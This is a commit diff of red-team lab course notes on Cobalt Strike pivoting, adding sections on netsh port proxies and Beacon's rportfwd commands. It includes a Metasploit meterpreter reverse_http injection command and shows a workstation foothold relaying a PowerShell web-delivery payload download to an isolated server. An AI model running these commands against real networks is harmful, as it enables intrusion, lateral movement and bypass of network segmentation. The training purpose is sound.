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AntoineBlaud authored and gitbook-bot committed Aug 19, 2022
1 parent d938d20 commit 5863913
Showing 1 changed file with 239 additions and 1 deletion.
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Expand Up @@ -275,7 +275,7 @@ And, here’s what this looks like in the Metasploit Framework console:
| <p><code>use exploit/windows/local/payload_injectset</code> </p><p><code>PAYLOAD windows/meterpreter/reverse_httpset</code> </p><p><code>LHOST [IP address of compromised system]</code></p><p><code>set LPORT 80set SESSION 1</code></p><p><code>set DisablePayloadHandler True</code></p><p><code>exploit –j</code></p> |
| ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |

#### Peer-to-Peer Listeners
### Peer-to-Peer Listeners

Peer-to-Peer (P2P) listeners allow Beacons to link their communications together to form a chain. The P2P types in Cobalt Strike are **TCP** and **SMB**.

Expand All @@ -285,6 +285,244 @@ Creating P2P listeners can be done in the **Listeners** menu, by selecting the *

If executing a P2P payload on a target manually, it won't appear in the UI until the `link` (for SMB Beacons) or `connect` (for TCP Beacons) command is used. You can also `unlink` P2P Beacons and then use `link` again from another Beacon to reorganise the chain.

### Reverse Port Foward

Reverse Port Forwarding allows a machine to redirect inbound traffic on a specific port to another IP and port. A useful implementation of this allows machines to bypass firewall and other network segmentation restrictions, to talk to nodes they wouldn't normally be able to. Take this very simple example:

Computers A and B can talk to each other, as can B and C; but A and C cannot talk directly. A reverse port forward on Computer B can act as a "relay" between Computers C and A.


There are two main ways to create a reverse port forward:

1. Windows `netsh`.
2. Reverse port forward capability built into the C2 framework.

#### Windows Firewall

Let's start with the Windows Firewall.

In the lab, there are four domains:,, zeropointsecurity.local and subsidiary.external. Not all of these domains can talk to each other directly - the traffic flow looks a little like this:


For instance - can talk with, but not to subsidiary.external. So let's use this as an opportunity to create a reverse port forward that will allow _dc-1.cyberbotic.io_ to talk to ad\_.subsidiary.external\_ via

&#x20; It's not necessary to specifically use domain controllers, it's just a convenience factor here.

First, run the following PowerShell script on the target, _ad.subsidiary.external_:

$endpoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Any, 4444)
$listener = New-Object System.Net.Sockets.TcpListener $endpoint
Write-Host "Listening on port 4444"
while ($true)
$client = $listener.AcceptTcpClient()
Write-Host "A client has connected"

This will bind port 4444, listen for incoming connections and print a message when something does. This is how we're going to prove the reverse port forward works.

Try to connect to this port from _dc-1.cyberbotic.io_ and it should fail.

PS C:\> hostname
PS C:\> Test-NetConnection -ComputerName -Port 4444
WARNING: TCP connect to failed
WARNING: Ping to failed -- Status: TimedOut

The native `netsh` (short for Network Shell) utility allows you to view and configure various networking components on a machine, including the firewall. There's a subset of commands called `interface portproxy` which can proxy both IPv4 and IPv6 traffic between networks.

The syntax to add a **v4tov4** proxy is:

netsh interface portproxy add v4tov4 listenaddress= listenport= connectaddress= connectport= protocol=tcp


* **listenaddress** is the IP address to listen on (probably always
* **listenport** is the port to listen on.
* **connectaddress** is the destination IP address.
* **connectport** is the destination port.
* **protocol** to use (always TCP).

On (the relay), create a portproxy that will listen on 4444 and forward the traffic to _ad.subsidiary.external_, also on 4444.

C:\>netsh interface portproxy add v4tov4 listenaddress= listenport=4444 connectaddress= connectport=4444 protocol=tcp

&#x20; You won't see any output from the command, but you can check it's there with `netsh interface portproxy show`.

C:\>netsh interface portproxy show v4tov4
Listen on ipv4: Connect to ipv4:
Address Port Address Port
--------------- ---------- --------------- ---------- 4444 4444

Now, from _dc-1.cyberbotic.io_, instead of trying to connect directly to _ad.subsidiary.external_, connect to this portproxy on and you will see the connection being made in the PowerShell script.

PS C:\> hostname
PS C:\> Test-NetConnection -ComputerName -Port 4444
ComputerName :
RemoteAddress :
RemotePort : 4444
InterfaceAlias : Ethernet
SourceAddress :
TcpTestSucceeded : True

PS C:\Users\Administrator\Desktop> hostname
PS C:\Users\Administrator\Desktop> .\listener.ps1
Listening on port 4444
A client has connected

To remove the portproxy:

C:\>netsh interface portproxy delete v4tov4 listenaddress= listenport=4444

Aspects to note about netsh port forwards:

* You need to be a local administrator to add and remove them, regardless of the bind port.
* They're socket-to-socket connections, so they can't be made through network devices such as firewalls and web proxies.
* They're particularly good for creating relays between machines.

#### rportfwd Command

Next, let's look at Beacon's `rportfwd` command.

In the lab and many corporate environments, workstations are able to browse the Internet on ports 80 and 443, but servers have no direct outbound access (because why do they need it?).

Let's imagine that we already have foothold access to a workstation and have a means of moving laterally to a server - we need to deliver a payload to it but it doesn't have Internet access to pull it from our Team Server. We can use the workstation foothold as a relay point between our webserver and the target.

If you don't already have a payload hosted via the Scripted Web Delivery, do so now. Then from, attempt to download it.

PS C:\> hostname
PS C:\> iwr -Uri
iwr : Unable to connect to the remote server

The syntax for the `rportfwd` command is `rportfwd [bind port] [forward host] [forward port]`. On WKSTN-1:

beacon> rportfwd 8080 80
[+] started reverse port forward on 8080 to

This will bind port **8080** on the foothold machine, which we can see with **netstat**.

beacon> run netstat -anp tcp
Active Connections
Proto Local Address Foreign Address State

Now any traffic hitting this port will be redirected to **** on port **80**. On DC-2, instead of trying to hit ****, we use **** (where is the IP address of WKSTN-1).

PS C:\> iwr -Uri
StatusCode : 200
StatusDescription : OK
Content : $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("H4sIAAAAAAAAAOy9Wa/qSrIu+rzrV8yHLa21xNo

The Web Log in Cobalt Strike also lets us know the request has reached us.

07/09 16:17:24 visit (port 80) from:
Request: GET /a
page Scripted Web Delivery (powershell)
Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.14393.3866

This is a contrived demo, but we'll see practical examples of using this in modules such as **Group Policy** and **MS SQL Servers**.

To stop the reverse port forward, do `rportfwd stop 8080` from within the Beacon or click the **Stop** button in the **Proxy Pivots** view.

Aspects to note:

* Beacon's reverse port forward always tunnels the traffic to the Team Server and the Team Server sends the traffic to its intended destination, so shouldn't be used to relay traffic between individual machines.
* The traffic is tunnelled inside Beacon's C2 traffic, not over separate sockets, and also works over P2P links.
* You don't need to be a local admin to create reverse port forwards on high ports.

#### rportfwd\_local

Beacon also has a `rportfwd_local` command. Whereas `rportfwd` will tunnel traffic to the Team Server, `rportfwd_local` will tunnel the traffic to the machine running the Cobalt Strike client.

This is particularly useful in scenarios where you want traffic to hit tools running on your local system, rather than the Team Server.

Take this Python http server as an example, whilst running the CS client on Kali:

root@kali:~# echo "This is a test" > test.txt
root@kali:~# python3 -m http.server --bind 8080
Serving HTTP on port 8080 (

beacon> rportfwd_local 8080 8080
[+] started reverse port forward on 8080 to rasta ->

This will bind port 8080 on the machine running the Beacon and will tunnel the traffic to port 8080 of the localhost running the Cobalt Strike client. Notice how it uses your username as an indicator of where the traffic will go.

Then on another machine in the network, try to download the file.

PS C:\> hostname
PS C:\> iwr -Uri http://wkstn-1:8080/test.txt
StatusCode : 200
StatusDescription : OK
Content : This is a test

Of course, we see the request on the Python server.

root@kali:~# python3 -m http.server --bind 8080
Serving HTTP on port 8080 ( ... - - [23/Jul/2021 19:24:30] "GET /test.txt HTTP/1.1" 200 -

## References


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